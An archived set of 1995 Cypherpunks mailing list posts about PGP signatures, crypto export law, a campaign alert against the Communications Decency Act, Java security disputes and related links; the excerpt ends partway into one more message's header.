Date: Tue, 7 Nov 1995 05:41:42 +0800
To: James Black <black@eng.usf.edu>
Subject: re:using PGP only for digital signatures
Message-ID: <199511062107.NAA29648@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:12 PM 11/4/95 -0500, James Black <black@eng.usf.edu> wrote:
>Hello,
>  I am in a discussion (during the week) with a system administrator 
>about seeing if we can just make PGP publically available to everyone, 
>but now the discussion seems to be to just allow PGP to do digital 
>signatures, and I don't think that is the best choice, then.  They are 
>not against PGP being used, but there are legal issues as to whether they 
>can offer it to everyone, as some students are international students, 
>and are not allowed to use the version for the US, or so I have been 
>informed, so now I need to see if we can have the international version, 
>so these students can use it. :(
>  Is there any good programs (for the Unix, SunOS) that just does digital 
>signature encryption?  What they are trying to do is make certain that no 
>one can send a message to anyone, claim to be in the faculty, and cause 
>problems that way.  My position is just a student programmer, but I am 
>trying to learn as much as I can, to answer questions and deal with problems.

Yeah, there's RIPEM-SIG, which is approved for export so you can even give it
to your non-Yankee students, and it's compatible with the RIPEM secure email
stuff.
So your US students, and anyone else who wants to download the software from
England, can send secure email, and everybody can check the signatures.
I'm not sure if RIPEM-SIG has caught up with the features in the latest
versions of RIPEM, which include an X.509 variant on Web of Trust.

Somebody else has brought up the insecurity of using security software
on multi-user machines, where the system administrator or anybody who cracks
root can steal your passphrases and even replace the trustable software with
trojan-horse versions; your students will be safer if they only trust stuff
running on PCs from software they've verified themselves.  But you can at least
do signature-checking safely on a multi-user machine if the software is
protected adequately.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 7 Nov 1995 04:04:38 +0800
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: So much for free speech...[noise?]
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <9511061923.AA16190@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Laurent Demailly writes:
 > Thus, your freedom of speach shall stops where it starts hurting
 > people

It hurts me --- really --- to read that.  You should be condemned.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 02:55:18 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: lp ?
Message-ID: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: 
: Thaddeus J. Beier writes:
: > So, if this person was sending cryptographics codes from Switzerland
: > to Israel, the code would have been imported to the US, then exported
: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
: > but it might be something to threaten UUNET with if one of their Northern
: > Virginia neighbors ever wanted something the couldn't get otherwise.
: 
: It isn't clear that telecoms treaties don't implicitly make this legal
: in spite of the export regulations.

Once again, what the ITAR forbid is the disclosure of cryptographic
software to a foreign person within or without the United States, so
it does not make any difference whether the message containing the
code passes through the United States or not.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Tue, 7 Nov 1995 22:40:29 +0800
To: beeson@aclu.org
Subject: Religious Right Threatens to Shut Down Net: Call NOW
Message-ID: <951106134311_99292624@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Here are the advocacy instructions for individuals opposed to the Federal
Online Indecency Legislation that we promised last week.

========================================================================
       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
	(SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

	Update: -Latest News:
		 The Christian Coalition is pushing Congress to censor
		 the net more heavily than even Sen. J.J. Exon ever imagined.
	 	 There is the very real possibility that they may succeed.

		 You should be very worried.  We are.

		-What You Can Do Now:
	 	 Follow the directions below and call House Speaker
		 Gingrich and Senate Leader Dole.  Implore them
		 to allow parents to make choices for their children, instead
		 of government censors.

		 Volunteer to join the fight by helping organize in your
		 home town.  

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
			   Nov 2, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
		REDISTRIBUTE ONLY UNTIL December 1, 1995
	       REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

________________________________________________________________________
CONTENTS
	The Latest News
	What You Can Do Now
	The letter from Ed Meese and the Christian Right
	Chronology of the CDA
        For More Information
        List Of Participating Organizations

________________________________________________________________________
THE LATEST NEWS

Since the very first day that Senator J.J. Exon (D-NE) proposed censorship
legislation for the Internet, the Christian Right has pushed for the most
restrictive regulations they could think of.

The Religious Right (which does not necessarily speak for all religious
people concerned with this issue) recently tipped their hand in a letter
to Sen. Larry Pressler (R-SD) and Rep. Thomas Bliley (R-VA) requesting
a new and more restrictive net censorship proposal.

There are essentially three new dangerous elements of their campaign
to shut down cyberspace:


INTERNET PROVIDERS, ONLINE SERVICES, AND LIBRARIES CRIMINALLY LIABLE FOR
 EXPRESSION ONLINE
The Religious Right has proposed to hold anyone who provides access to the
Internet or other interactive media, including online services providers,
ISP's, BBS's, Libraries, and Schools, criminally liable for all speech
carried on the network.

In order to avoid liability under this provision, service providers would be
forced to monitor user's electronic communications to be assured that
no "indecent" material is transmitted across their networks.

This proposal is MORE RESTRICTIVE than the Exon Communications Decency Act,
or any other net censorship legislation currently in Congress.

In their letter to Congress, the Religious Right says:

	[Providers] would simply be required to avoid KNOWING violations of
	the law. [emphasis added]

However, the "knowing" standard is vague enough that the mere knowledge
that such material exists could be sufficient to trigger criminal liability.
A single complaint or even a news report could force a service provider to
take down a web page, remove posts to chat rooms or other discussion
forums, or shut down listservs in order to avoid going to jail and facing
huge fines.


A STANDARD FOR INDECENCY
The proposals pushed by the Christian Coalition relies on the
unconstitutional "indecency standard".  Like the Exon Communications
Decency Act, the Christian Coalition seeks to regulate all indecent
speech online.

Indecency is a broad category that includes everything from George Carlin's
"seven dirty words" to such classic novels and "The Catcher in the Rye" and
"Lady Chatterly's Lover". 

The Supreme Court has ruled that restrictions on indecent speech are 
Constitutional only if they rely on the "least restrictive means".  Broad
indecency restrictions on interactive media do not satisfy the "least
restrictive means" test, because interactive media allows users and
parents tremendous control over the information they receive.

Any legislation which attempts to apply an indecency restriction to the 
Internet is unconstitutional on its face.

The Christian Coalition's proposal that relies on an indecency
restriction contemplates dumbing down every conversation, web page,
newsgroup, and mailing list on the Internet to the level of what is
not offensive to children.

What kind of discussions between adults are possible in an arena
where everything has been reduced to the level of the Lion King?


UNPRECEDENTED CONTROL OVER ONLINE SPEECH FOR THE FCC
The Christian Coalition would give the FCC broad jurisdiction over
cyberspace.  It would allow the FCC jurisdiction over your online
speech, and over the design Internet software, such as web browsers and
filtering programs that parents can use to control their children's
access to the Internet.

The Internet has developed from a government project to a market-driven
economic boom for thousands of businesses.  Giving the FCC authority over
this medium would significantly hinder the growth of this new industry.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. The proposals from the Religious Right will literally destroy online
   speech as we know it.  The odds of stopping this are not certain.

   There is a very real chance that this legislation will pass, and
   we will experience a period of uncertainty and chilling of speech
   while an appropriate test case attempts to reach the Supreme Court
   (should it even get there!)

   The Religious Right has a strong grass-roots network.  We need to
   counter their energy and ensure cyberspace is not lost due to them.

   IMMEDIATELY CALL House Speaker Gingrich (R-GA) and Senate Leader
   Dole (R-KS) and urge them to oppose the Christian Coalition's
   proposal.

   Name, Address, and Party     Phone            Fax
   ========================     ==============   ==============
   R GA Gingrich, Newt 		1-202-225-4501   1-202-225-4656
   R KS Dole, Robert            1-202-224-6521   1-202-224-8952

   If you're at a loss for words, try one of the following:

	Please oppose the recent proposal from the Religious Right to
	censor the Internet.  The only effective way to address children's
	access to the Internet is through parental control tools outlined
	by the Cox/White/Wyden approach.
   or
	As a religious person and a parent, I oppose the Religious Right's
	attempts to censor the Internet.  I am the best person to monitor
 	my child's access to the Internet using parental control tools
	as outlined in the Cox/White/Wyden approach.
  
2. Join the online fight by becoming a volunteer for your district!

   Check to see if you're legislator is in the list below.  If they are
   not, consult the free ZIPPER service that matches Zip Codes to
   Congressional districts with about 85% accuracy at:

	URL:http://www.stardot.com/~lukeseem/zip.html

   The conference committee legislators are:
   House: Barr (R-GA), Barton (R-TX), Berman (R-CA), Bliley (R-VA),
	Boucher (D-VA), Brown (D-OH), Bryant (D-TX), Buyer (R-IN),
	Conyers (D-MI), Dingell (D-MI), Eshoo (D-CA), Fields (R-TX),
	Flanagan (R-IL), Frisa (R-NY), Gallegly (R-CA), Goodlatte (R-VA),
	Gordon (D-TN), Hastert (R-IL), Hoke (R-OH), Hyde (R-IL),
	Jackson-Lee (D-TX), Klug (R-WI), Lincoln (D-AR), Markey (D-MA),
	Moorhead (R-CA), Oxley (R-OH), Paxon (R-NY), Rush (D-IL),
	Schaefer (R-CO), Schroeder (D-CO), Scott (D-VA), Stearns (R-FL),
	White (R-WA)
   Senate: Burns (R-MT), Exon (D-NE), Ford (D-KY), Gorton (R-WA),
	Hollings (D-SC), Inouye (D-HI), Lott (R-MS), McCain (R-AZ),
	Pressler (R-SD), Rockefeller (D-WV), Stevens (R-AK)

   If your legislator is on the conference committee, you have a chance
   to influence their vote on this issue with your power as a constituent.
   Volunteer to help educate your legislator by sending mail to
   volunteer@vtw.org.  A coalition volunteer will be in touch with you.

   You can starting working to help spread the word in your district by
   sending this letter to five friends.  Ask them to call Dole and Gingrich
   as well.

3. The People for the American Way (PFAW) and the American Civil Liberties
   Union are organizing a letter from ORGANIZATIONS to the Conference
   Committee to oppose the censorship provisions.

   If you are a representative of an organization that would like to
   signon to this letter, you should contact jlesser@pfaw.org IMMEDIATELY. 

4. We can't suggest relaxing at this point.  The stakes are too high, and
   the risk is too great.  Everything now hangs in the balance.

________________________________________________________________________
THE LETTER FROM ED MEESE AND THE CHRISTIAN RIGHT

October 16, 1995
 
The Honorable Thomas J. Bliley, Jr.  Chairman
Committee on Commerce
United States House of Representatives
Washington, DC 20515
 
The Honorable Larry Pressler, Chairman
Committee on Commerce, Science, and Transportation
United States Senate
Washington, DC 20510
 
Re: Computer Pornography Provisions in Telecommunications Bill
 
Dear Mr. Chairmen:
 
We are writing to urge the conference committee seeking to reconcile the
telecommunications bills passed by the House and Senate include in the
final bill the strongest possible criminal law provisions to address the
growing and immediate problem of computer pornography without any
exemptions, defenses, or political favors of any kind accorded to those
who knowingly participate in the distribution of obscenity to anyone or
indecency to children. While there is no perfect solution to the problem
of computer pornography, Congress could not hope to solve this problem by
holding liable only some who are responsible for the problem.
 
The recent Justice Department prosecution project targeting those who
violated federal child pornography law using America On-Line is
instructive in this regard. More than ninety individuals were targeted for
prosecution although many others, perhaps as many as 3,000 according to
one press report, were originally targeted by the Department of Justice as
potential violators of child pornography laws. Apparently due to a
shortage of investigative and prosecutorial resources, the project was
limited. Since there are insufficient resources to investigate and
prosecute but a fraction of those that are trafficking in child
pornography by computer, then there will likely be even fewer resources
available to investigate and prosecute those involved in obscenity and
indecency.
 
Thousands of individuals both in this country and abroad are regularly
placing obscenity and indecency on the Internet. It is not possible to
make anything more than a dent in the serious problem of computer
pornography if Congress is willing to hold liable only those who place
such material on the Internet while at the same time giving legal
exemptions or defenses to service or access providers who profit from and
are instrumental to the distribution of such material. The Justice
Department normally targest the major offenders of laws. In obscenity
cases prosecuted to date, it has targeted large companies which have been
responsible for the nationwide distribution of obscenity and who have made
large profits by violating federal laws. Prosecution of such companies has
made a substantial impact in curbing the distribution of obscenity, with
many such offenders going out of business altogether. So too will
prosecution of access providers which _knowingly_ traffic in obscenity
have a substantial impact, a far greater impact than just the prosecution
of a person who places one or a few prohibited images on the Internet.
Such a person could not traffic in pornography without the aid or
facilitation of the service or access providers. Indeed, if Congress
includes provisions protecting access or service providers in whatever
bill is finally passed, it is likely that most in this country who are
trafficking in indecency to children or obscenity would continue to do so
since the threat of prosecution would be minuscule, given the numbers of
those currently involved in this activity. It is also likely that those
outside our country who are engaged in these activities would continue to
do so since it would be nearly impossible to extradite them to the United
States for prosecution. Thus, unless all who knowingly participate in such
matters are subject to the law, the Internet will remain the same and
Congress will have failed in its responsibilities to the children and
families of America.
 
Federal law has traditionally assigned equal liability both for those who
commit a crime and those who aid and abet a crime. See Title 18 U.S.C.
Code Section 2: "(a) whoever [sic] commits an offense against the United
States or aids, abets, councils [sic], commands, induces, or procures its
commission, is punishable as a principle [sic]." Service or access
providers who knowingly participate in the distribution of indecency to
children or in obscenity to anyone are aiders and abettors in the
commission of those crimes and thus should have liability under any law
Congress passes. Current federal law on child pornography provides no no
exemption or defense for access providers. Thus, the child pornography law
provides a strong deterrent against trafficking in child pornography for
those who would otherwise knowingly participate in its distribution by
computer whether pedophile or access provider.
 
The changes in law which we support would not hold an access provider
criminally liable for all illegal pornography on the Internet which their
services may be used to obtain. Nor would it require that access providers
check all communications to ensure that no violations of the law are
occurring. They would simply be required to avoid knowing violations of
the law. This is an obligation imposed on all citizens. Technology exists
today for access providers, through a simple process, to target or flag
and remove files containing objectionable material.
 
We support the House-passed language insofar as it addresses obscenity by
amendment Title 18, Sections 1462, 1465, and 1467 of the United States
Code. The provision restricting transmission of indecency in the House-passed
bill, an amendment to Section 1465, is inadequate, and we urge that it be
substantially revised.
 
Attached is the specific language we support which includes the House
passed language on obscenity and includes revisions on both the House
passed language on indecency, which would amend Title 18 and the
Senate-passed language on indecency, which would amend Title 47. The
combination of these provisions, we believe, would provide effective laws
to curb obscenity and indecency on the Internet by establishing that all
who knowingly participate in the distribution or facilitation of obscenity
to anyone or indecency to children would be subject to the law.
 
Thank you for your concern and attention to this matter.
 
 
[signed]
 
Edwin Meese III
 
Ralph Reed
Christian Coalition
 
Donald E. Wildmon
American Family Association
 
Alan Sears, Former Executive Director
Atty General's Commission on Pornography
 
Phyllis Shafly
Eagle Forum
 
Beverly LaHaye
Concerned Women for America
 
Reverend Louis P. Sheldon
Traditional Values Coalition
 
Jay Sekulow
American Center for Law and Justice
 
Paul Weyrich
Free Congress Foundation
 
Paul McGeady
Morality in Media
 
Len Munsil
National Family Legal Foundation
 
Robert Peters
Morality in Media
 
Kenneth Sukhia
Former United States Attorney, N.D., FL
Former Chairman, Atty General's Advisory Committee
Subcommittee on Child Exploitation and Obscenity


--------------------------

 
Section 1465 of Title 18, United States Code, is amended to punish
distribution by computer of indecent material to minors by adding at the
end the following:
 
Whoever knowingly communicates, transmits, or makes available for
communication or transmission, in or effecting interstate or foreign
commerce an indecent communication by computer to any person the
communicator or transmitter believes has not attained the age of 18 years
of age, knowing that such communication will be obtained by a person
believed to be under 18 years of age, shall be fined under this title or
imprisoned not more than five years, or both.
 
TITLE IV -- OBSCENE, HARASSING, AND WRONGFUL UTILIZATION OF
TELECOMMUNICATIONS FACILITY
 
SEC. 401. SHORT TITLE
         This title may be cited as the "Communications Decency Act of
1995".
 
Sec. 402. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER
THE COMMUNICATIONS ACT OF 1934
 
Section 223 (47 U.S.C. 223) is amended --
   (1) by striking subsection (a) and inserting in lieu of [sic]:
 ``(a) Whoever--
    ``(1) in the District of Columbia or in interstate or foreign
communications --
        ``(A) by means of telecommunications device knowingly--
          ``(i) makes, creates, or solicits, and
          ``(ii) initiates the transmission of,
     any comment, request, suggestion, proposal, image, or other
     communication which is obscene, lewd, lascivious, filthy, or
     indecent, with intent to annoy, abuse, threaten, or harass
     another person;
         ``(B) makes a telephone call or utilizes a
     telecommunications device, whether or not conversation or
     communication ensues, without disclosing his identity and
     with intent to annoy, abuse, threaten, or harass any person
     at the called number or who receives the communication;
         ``(C) makes or causes the telephone of another repeatedly
     or continuously to ring, with intent to harass any person at
     the called number; or
         ``(D) makes repeated telephone calls or repeatedly
     initiates communication with a telecommunications device,
     during which conversation or communication ensues, solely to
     harass any person at the called number or who receives the
     communication;
      ``(2) knowingly permits any telecommunications facility
     under his control to be used for any activity prohibited by
     paragraph (1) with the intent that it be used for
     such activity,
 
  shall be fined not more than $100,000 or imprisoned not more
  than two years, or both.''; and
 
   (2) by adding at the end the following new subsections:
 
 ``(d) Whoever--
       ``(1) knowingly within the United States or in foreign
     communications with the United States by means of
     telecommunications device makes or makes available any
     indecent communication in any form including any comment,
     request, suggestion, proposal, or image, to any person under
     18 years of age regardless of whether the
     maker of such communication placed the call or initiated the
     communication; or
       ``(2) knowingly permits any telecommunications facility
     under such person's control to be used for an activity
     prohibited by paragraph (1) with the intent that it be
     used for such activity,
  shall be fined not more than $100,000 or imprisoned not more
  than two years or both.
      ``(e) Defenses to subsections (a) and (d), restrictions on 
     access, judicial remedies respecting restrictions for
     persons providing information services and
     access to information services--
      "(1) It is a defense to prosecution that a person has complied
     with regulations designed to restrict access to indecent
     communications to those 18 years old or older as enacted by the
     Federal Communications Commission which shall prepare final 
     regulations within 120 days of the passage of this bill. Until
     such regulations become effective, it is a defense to
     prosecution that the person has blocked or restricted access
     to indecent communications to any person under 18 years
     of age through the use of verified credit card, adult access
     code, or adult personal identification number (PIN).   
     Nothing in this subsection shall be construed to treat
     enhanced information services as common carriage."
       "(2) No cause of action may be brought in any
     court or any administrative agency against any person on account
     of any activity which is not in violation of any law punishable
     by criminal or civil penalty, which activity the person has taken in
     good faith to implement a defense authorized under this section or
     otherwise to restrict or prevent the transmission of, or access to,
     a communication specified in this section.
     (f) Nothing in this subsection shall preclude any State or
     local government from enacting and enforcing laws and regulations
     which do not result in the imposition of inconsistent obligations on
     the provision of interstate services.  Nothing in this subsection
     shall preclude any State or local government from governing conduct
     not covered by subsection (d)(2)."
     (g) Nothing in subsection (a), (d), or (e) or in the
     defenses to prosecution under (e) shall be construed
     to affect or limit the application or enforcement of any other
     Federal law.
     (h) The use of the term 'telecommunications device' in this
     section shall not impose new obligations on (one-way) broadcast
     radio or (one-way) broadcast television operators licensed by the
     Commission or (one-way) cable services registered with the
     Federal Communications Commission and covered by obscenity and
     indecency provisions elsewhere in this Act.
 
Sec. 403. OBSCENE PROGRAMMING ON CABLE TELEVISION.
 
        Section 639 (47 U.S.C. 559) is amended by striking "10,000" and
inserting "$100,000"
 
Sec. 404. BROADCASTING OBSCENE LANGUAGE ON THE RADIO.
 
        Section 1466 of Title 18, United States Code, is amended by
striking out "$10,000" and inserting "$100,000".
 
Sec. 405 SEPARABILITY
 
        "(a) If any provision of this Title, including amendments to this
Title of [sic] the application thereof to any person or circumstance is
held invalid, the remainder of this Title and the application of such
provision to other persons or circumstances shall not be affected
thereby."

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

Sep 26, '95	Sen. Russ Feingold urges committee members to drop
		Managers Amendment and the CDA from the Telecommunications
		Deregulation bill
Aug  4, '95	House passes HR1555 which goes into conference with S652.
Aug  4, '95	House votes to attach Managers Amendment (which contains
		new criminal penalties for speech online) to
		Telecommunications Reform bill (HR1555).
Aug  4, '95	House votes 421-4 to attach HR1978 to Telecommunications
	 	Reform bill (HR1555).
Jun 30, '95	Cox and Wyden introduce the "Internet Freedom and Family
		Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink of (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary
committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites
        URL:http://www.vtw.org/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
	URL:http://outpost.callnet.com/outpost.html

FTP Archives 
        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw@vtw.org (put "send alert" in the subject line for the latest
		alert, or "send cdafaq" for the CDA FAQ)
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.

American Civil Liberties Union * American Communication Association *
American Council for the Arts * Arts & Technology Society * Association
of Alternative Newsweeklies * biancaTroll productions * Boston
Coalition for Freedom of Expression * Californians Against Censorship
Together * Center For Democracy And Technology * Centre for Democratic
Communications * Center for Public Representation * Citizen's Voice -
New Zealand * Cloud 9 Internet *Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
Electronic Frontier Foundation - Austin * Electronic Frontiers
Australia * Electronic Frontiers Houston * Electronic Frontiers New
Hampshire * Electronic Privacy Information Center * Feminists For Free
Expression * First Amendment Teach-In * Florida Coalition Against
Censorship * FranceCom, Inc. Web Advertising Services * Friendly
Anti-Censorship Taskforce for Students * Hands Off!  The Net * Inland
Book Company * Inner Circle Technologies, Inc. * Inst. for Global
Communications * Internet On-Ramp, Inc. * Internet Users Consortium *
Joint Artists' and Music Promotions Political Action Committee * The
Libertarian Party * Marijuana Policy Project * Metropolitan Data
Networks Ltd. * MindVox * MN Grassroots Party * National Bicycle
Greenway * National Campaign for Freedom of Expression * National
Coalition Against Censorship * National Gay and Lesbian Task Force *
National Public Telecomputing Network * National Writers Union * Oregon
Coast RISC * Panix Public Access Internet * People for the American Way
* Republican Liberty Caucus * Rock Out Censorship * Society for
Electronic Access * The Thing International BBS Network * The WELL *
Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)

________________________________________________________________________
	End Alert
========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 7 Nov 1995 04:28:01 +0800
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: [NOISE] Re: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <9511061047.AA13370@all.net>
Message-ID: <Pine.SUN.3.90.951106134640.212A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Ahh I told my self I would not reply to this but this next statement 
proved to me the "Dr. FC" has never read the Java Language Specification.

> >       Object field accesses are known to be legal--private or public
> > 	or protected
> 
> What exactly does this mean?

Obiously he has no idea what an object field is and what modifiers such 
as private or public do.

Also as in you flamage of Netscape you wont find answers here. If you 
really wanted answers you would post to the java mailinglist at Sun
where their engeniers would answer you questions. But its seems you dont 
really want answers. In anycase I'am crossposting this to the java 
mailing list.

a1

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 04:10:03 +0800
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: lp ?
In-Reply-To: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511061924.OAA14371@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> "Perry E. Metzger" writes:
> : It isn't clear that telecoms treaties don't implicitly make this legal
> : in spite of the export regulations.
> 
> Once again, what the ITAR forbid is the disclosure of cryptographic
> software to a foreign person within or without the United States, so
> it does not make any difference whether the message containing the
> code passes through the United States or not.

I understand that you are a lawyer and I'm not, but it is my
understanding that international treaties come in to play on this sort
of thing. For instance, in international shipments, you can transship
items and substances that are illegal to possess in a country through
its ports provided that the materials do not originate or terminate
their shipment in the country and remain sealed in their containers
throughout. It is also my understanding that items like mail and phone
calls that happen to transit a country are not necessarily subject to
that nations laws provided that the nation is not a terminal point for
the mail or call or what have you.

Treaties on this subject would quite clearly superseed any federal
laws under the supremacy clause of the constitution.

I am not absolutely sure of this, but I'm fairly sure that there are
already rules on all of this.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 6 Nov 1995 13:31:54 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <Pine.SOL.3.91.951106125951.9610D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 3 Nov 1995, Futplex wrote:
> Suppose I have serious and plausibly realistic aspirations to become an 
> authority in some subtopic of cryptography, network security, etc. (sometime 
> well into the next millenium). Am I more likely to learn and hone my skills
> by actively participating (sticking my neck out) or merely lurking
> indefinitely ?  Regardless of the answer to the previous question, should
> the list suffer me my missteps and naivete ?

I too have though about this question.  While I write crypto code and know
some areas quite well, I also seem to be blessed with the ability to
displaying my total ignorance in other areas in very public forums.  Since
I have no professional reputation to protect (I don't work in the
crypto field) and don't really have any 'aspirations to become an
authority', I feel I can do this so long as I also make
an effort to answer the question in the area of my expertise and to
also share the information I gain.

The difference between ignorance and stupidity is that one decreases 
with time :-).

eric (who is quite happy to admit his ignorance :-)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Mon, 6 Nov 1995 22:09:47 +0800
To: cypherpunks@toad.com
Subject: Crypto Law Survey - updated and online
Message-ID: <MAILQUEUE-101.951106143524.384@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


I have updated my survey of cryptography regulations worldwide. It is 
available at URL

http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Please set pointers to this URL rather than copy the file, as I 
intend to regularly (i.e., about once every two months) update the 
survey. 

I greatly appreciate comments, corrections, and additional 
information.

Bert-Jaap Koops
Center for Law and Informatization
Tilburg University
The Netherlands




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 7 Nov 1995 04:49:50 +0800
To: Usuario Acceso2 <acceso2@diatel.upm.es>
Subject: Re: Wich pgp is stronger?
In-Reply-To: <222*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
Message-ID: <199511062004.PAA10278@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Wich pgp is supposed to be stronger, 2.6.2 or 2.6.2 i?
> 
> What are exactly the differences between them?

I'm not sure what you mean by "stronger"?  I must admit that I have
not taken a close look at 2.6.2i, but my understanding is that it is
an internationalized version of code similar to 2.6.2.  The keygen
routines, RNG, and IDEA code are the same; the RSA code is different,
but supports the same range of keysizes.  The difference in RSA code
has to do with US patent law, where PGP 2.6.2 uses RSAREF, so it is
licensed to do RSA.

Other than that, I doubt there is any real difference.  The major
crypto and security functions are the same (or should be -- as I said,
I've not taken a close look at 2.6.2i).

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Tue, 7 Nov 1995 06:17:32 +0800
To: cypherpunks@toad.com
Subject: DejaNews all over again--a URL for Usenet Searching (fwd)
Message-ID: <m0tCZ3A-0005LoC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> 
> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> 
> http://dejanews.com/
> 
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).
> 

> 
> "    Want to know what people are saying about some new book?  About
> some political topic?  Most importantly, about you behind your back?
> Check it out!  Lots of fun, and a bit scary."
> 

Or to paraphrase Huey Long, "Every Man a Kibo".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
